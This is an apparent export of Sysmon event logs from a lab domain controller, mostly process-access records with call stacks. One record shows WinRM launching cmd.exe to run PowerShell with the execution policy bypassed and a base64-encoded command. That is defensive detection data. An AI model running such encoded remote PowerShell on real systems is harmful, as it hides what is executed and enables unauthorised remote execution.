15:50:21.326{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.326{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.326{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.326{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.326{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.326{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000192Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.326{D28789B6-7AC1-5FA1-0500-000000008701}6361160C:\Windows\system32\csrss.exe{D28789B6-7C3D-5FA1-FA02-000000008701}3636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000191Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.326{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000190Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.326{D28789B6-7C3D-5FA1-F802-000000008701}30444732C:\Windows\system32\WinrsHost.exe{D28789B6-7C3D-5FA1-FA02-000000008701}3636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x8000000000000000189Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.338{D28789B6-7C3D-5FA1-FA02-000000008701}3636C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3D-5FA1-E3BE-100000000000}0x10bee30HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C3D-5FA1-F802-000000008701}3044C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000188Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.326{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000187Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.326{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000186Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.326{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000185Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.326{D28789B6-7AD2-5FA1-1400-000000008701}13681464C:\Windows\system32\svchost.exe{D28789B6-7C3D-5FA1-F802-000000008701}3044C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000184Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.310{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3D-5FA1-F802-000000008701}3044C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000183Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.310{D28789B6-7C3D-5FA1-F902-000000008701}38444216C:\Windows\system32\conhost.exe{D28789B6-7C3D-5FA1-F802-000000008701}3044C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000182Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.294{D28789B6-7AC1-5FA1-0500-000000008701}6361160C:\Windows\system32\csrss.exe{D28789B6-7C3D-5FA1-F902-000000008701}3844C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000181Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.294{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.294{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.294{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000178Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:21.294{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000177Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 